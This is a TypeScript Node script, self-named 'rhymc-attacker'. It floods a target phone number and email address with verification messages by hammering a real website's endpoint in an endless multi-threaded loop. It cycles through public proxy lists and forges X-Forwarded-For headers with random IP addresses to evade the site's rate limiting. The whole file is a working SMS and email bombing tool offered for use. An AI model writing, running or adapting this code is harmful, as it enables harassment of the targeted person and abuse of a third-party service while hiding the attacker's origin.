import { ProxyFetcher } from "./proxy";
import _ from "underscore";
import bunyan from "bunyan";
import qs from "querystring";
import iconv from "iconv-lite";

const targetPhone = process.env["TARGET_PHONE"];
const targetEmail = process.env["TARGET_EMAIL"];
const threadCount = process.env["THREADS"] ? parseInt(process.env["THREADS"]) : 1;

if (!targetPhone && !targetEmail) {
	throw "Either a target phone or a target email is needed.";
}

const proxy = new ProxyFetcher({
	useProxy: (process.env["USE_PROXY"] === "true"),
	proxySource: ["http://www.89ip.cn/tqdl.html?api=1&num=9999", "http://www.66ip.cn/mo.php?tqsl=9999"],
	timeout: 10000
})

const logger = bunyan.createLogger({ name: "rhymc-attacker" });

function getRandomIPAddress() {
	const tmpList: number[] = [];
	for (let i = 0; i < 4; ++i) {
		tmpList.push(Math.floor(Math.random() * 255));
	}
	return tmpList.join(".");
}

let loopCount = 0;

type AttackType = "sendemail" | "sendmobi";

async function attack(attackType: AttackType) {
	const attackID = ++loopCount;
	if (attackType === "sendemail" && !targetEmail || attackType === "sendmobi" && !targetPhone) {
		return;
	}
	const params: any = {
		lm: attackType,
		sd: Math.random()
	}
	if (attackType === "sendemail") {
		params.uemail = targetEmail;
	}
	if (attackType === "sendmobi") {
		params.umobie = targetPhone;
	}
	const fakeIP = getRandomIPAddress();
	logger.info(`${attackID}: Attack ${attackType} started => ${fakeIP} ${JSON.stringify(params)}`);
	try {
		const returnBuffer: Buffer = await proxy.getWithProxy("https://www.rhycloud.com/chkName.asp", {
			paramsSerializer: qs.stringify,
			params,
			responseType: "arraybuffer",
			headers: {
				"X-Forwarded-For": fakeIP
			}
		});
		const returnData = iconv.decode(returnBuffer, "GB2312");
		logger.info(`${attackID}: Attack ${attackType} result => ${returnData}`);
	} catch (e) {
		logger.warn(`${attackID}: Attack ${attackType} failed => ${e.toString()}`);
	}
}


async function main() {
	logger.info(`Started.`);
	logger.info(`Loading proxies.`);
	await proxy.initProxies();
	logger.info(`Attacking target phone: ${targetPhone} and target email: ${targetEmail}`);
	while (true) {
		for (let attackType of ["sendemail", "sendmobi"]) {
			const threads = _.range(threadCount).map(m => attack(attackType as AttackType));
			await Promise.all(threads);
		}
	}
}
main();
